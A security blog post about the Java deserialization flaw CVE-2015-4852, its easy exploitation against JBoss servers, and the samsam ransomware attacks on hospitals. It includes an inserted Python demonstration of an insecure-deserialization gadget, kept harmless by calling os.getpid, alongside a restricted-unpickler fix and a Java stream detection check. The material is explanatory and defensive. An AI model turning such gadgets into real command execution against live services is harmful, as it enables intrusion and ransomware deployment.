On November 10th, 2015, Oracle released CVE-2015-4852. Their alert page shows that the vulnerability allows remote code execution without authentication on Oracle WebLogic Servers[3]. That is bad enough to warrant serious research, but it was worse: on November 6, 2015, Foxglove Security had already published a blog titled “What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability[4]”. As it turns out, the issue was not confined to WebLogic but could be exploited in a large number of enterprise systems. The exploitable gadget chain lives in the Apache Commons Collections Java library, so any application that deserializes untrusted data with that library on its classpath is exposed. This prompted a slew of organizations to issue alerts, with CVEs continuing to be pushed out regularly.

While ysoserial.jar proved the exploit, it was still technically difficult to use. A user with sufficient knowledge of payload generation, Burp Suite, and coding could pull it off, but it remained out of the hands of skiddies. Or it did, until, on November 18th, 2015, Trust Foundry researcher Nick Fox released the Java Deserialization Exploit[5]. With this tool and very little knowledge, attacking vulnerable JBoss servers was as easy as LOIC.

With JBossExploit.jar and Shodan in hand, exploiting JBoss instances became trivially easy. While Trust Foundry demonstrated the attack with a reverse TCP shell, other hackers had bigger dreams.
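As an added editorial example (not the post’s code, nor ESET’s, Foxglove’s or Trust Foundry’s), here is the bug class from the two passages above in miniature, using Python’s pickle, which the “Marshalling Pickles” title nods to: the serialized bytes name the callable that runs on load, and the fix is an unpickler that resolves only an explicit allowlist. The last function is the wire-level check a defender wants for the JBoss case: every Java serialized object stream begins with the bytes AC ED 00 05 (STREAM_MAGIC 0xACED followed by STREAM_VERSION 5), so a request body starting that way is worth inspecting. The Order class, the allowlist and the sample request bodies are constructed.

```python
"""Untrusted deserialization in miniature, plus a wire-level check for Java streams.

Added editorial example; not the post's code or the tools it names. Python's
pickle has the property that makes the Java bug exploitable: the byte stream
itself names the callable that runs on load.
"""
import io
import os
import pickle


# --- the vulnerability class --------------------------------------------------
class Gadget:
    """Serializes as 'call os.getpid()'. An attacker would name os.system and
    pass a string instead; getpid is used so the demo stays harmless."""
    def __reduce__(self):
        return (os.getpid, ())


def build_malicious_pickle():
    return pickle.dumps(Gadget())


def load_unsafe(data):
    """What vulnerable code does: deserialize whatever arrived off the wire."""
    return pickle.loads(data)


# --- the fix: resolve only names you have explicitly allowed ------------------
class Order:
    """A constructed, legitimate business object the service expects to receive."""
    def __init__(self, sku, qty):
        self.sku, self.qty = sku, qty


ALLOWED_GLOBALS = {(Order.__module__, "Order")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def load_safe(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


# --- the wire-level check for the JBoss case ----------------------------------
# Every Java serialized stream starts with STREAM_MAGIC 0xACED then STREAM_VERSION 5.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"


def looks_like_java_serialized(body):
    """True if a request body (say, a POST to a JBoss invoker endpoint) is a Java object stream."""
    return body[:4] == JAVA_STREAM_MAGIC


# Constructed sample bodies: a truncated object stream and an ordinary form post.
SAMPLE_BODIES = [
    JAVA_STREAM_MAGIC + b"sr\x00\x11java.util.HashMap",
    b"user=alice&action=login",
]


def demo():
    """Run the three scenarios and return the outcomes rather than printing them."""
    gadget_ran = load_unsafe(build_malicious_pickle()) == os.getpid()
    try:
        load_safe(build_malicious_pickle())
        gadget_refused = False
    except pickle.UnpicklingError:
        gadget_refused = True
    order = load_safe(pickle.dumps(Order("sku-1", 2)))
    return {
        "gadget_ran_when_unsafe": gadget_ran,
        "gadget_refused_when_safe": gadget_refused,
        "legit_object_survives": isinstance(order, Order) and order.qty == 2,
        "java_stream_flags": [looks_like_java_serialized(b) for b in SAMPLE_BODIES],
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The unsafe loader returns the current process ID, which proves the attacker-chosen function executed inside the victim process; the restricted loader refuses the same bytes before any call happens, yet still rebuilds the legitimate Order. The Java magic check is deliberately dumb: it does not try to decide whether a stream is malicious, only that a Java object stream is arriving at an endpoint where, after the Foxglove write-up, you should not be accepting one from the internet at all.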


Enter Samsam.exe

On December 20th, 2015, Peter Kline informed the world that he was working with a client hit by a new virus, samsam.exe. The virus had spread through the whole network, encrypting files as it went using the Windows Cryptography API[6]. The earliest non-public instance this researcher has seen dates back to December 4th, 2015, and from there we were off to the races. Researchers began seeing an attack pattern take shape. As emails and incident response reports were passed around the community, the story finally broke: on February 12, 2016, NBC Los Angeles reported that Hollywood Presbyterian Hospital had been hit with ransomware. With media pressure now on, teams moved quickly to respond. On February 18, 2016, the FBI issued a TLP:GREEN FLASH document identifying samsam as MSIL/Samas.A (AKA Gen.Variant.Kazy or RDN/Ransom).

“After an initial compromise, attackers map, connect to, and infect hosts on the network using several uploaded files. […] The actor(s) then distribute the malware to each host in the network using a copy of Microsoft’s psexec.exe.”

On March 24th, the MS-ISAC alerted the public that JBoss/WildFly was linked to ransomware infections.


So What?
Here are the takeaways:

  • Lazy Incident Response is Lazy! – 99% of the media stories you have read regarding the hospital ransomware attacks have been wrong. The attacks, largely, are not coming in through phishing or drive-by attacks as you’ve been led to believe. They are coming in through this JBoss vulnerability.
  • We Aren’t Done Here – Now that the story is finally public enough for system administrators to realize the JBoss vulnerability exists, there are still thousands of programs out there using the underlying vulnerable commons-collections objects. JBoss may be getting patched, but if we’re only patching JBoss, then we’re not seeing the forest for the trees!
  • Hospitals Aren’t The Only Problem – While hospital attacks have been making the news, they are a symptom, not the problem. Focusing only on the hospitals is causing the industry to lose focus on the larger issue! Many enterprise systems use JBoss. All of them are vulnerable to the JBoss / ransomware double header. While you are reading about hospitals in the news, the actual target list includes schools, governments, mass transit systems, and any number of other systems we simply haven’t identified yet.
  • NDAs Suck – In this incident, the pieces were there to put together from the minute the attacks started. NDAs and the lack of communication between groups attempting to solve this problem have allowed the problem to grow, have stifled progress in mitigating the issue, and have resulted in multiple media outlets misreporting the attacks. Poor users are being forced to attend spear-phishing classes while third-party vendors continue to deploy vulnerable JBoss instances inside some of our most trusted networks. If we want to get a handle on this, we need to work together. For every incident being reported on publicly, there are many organizations hiding the fact that they were attacked. The issue is larger than you’ve been led to believe, it affects more than you were told it did, and it had nothing to do with phishing. The sooner we collectively attack this thing, the sooner we can go back to sipping beers at DEFCON.

Technical Details

There are brilliant technical write-ups being done on this issue, and replicating the hashes and malware analysis already out there isn’t what we’re aiming to do here. For technical details, including Snort rules and other things an incident response or IT manager may need, please review FBI FLASH MC-000068-MW. The Talos team has also published a write-up chock full of technical details.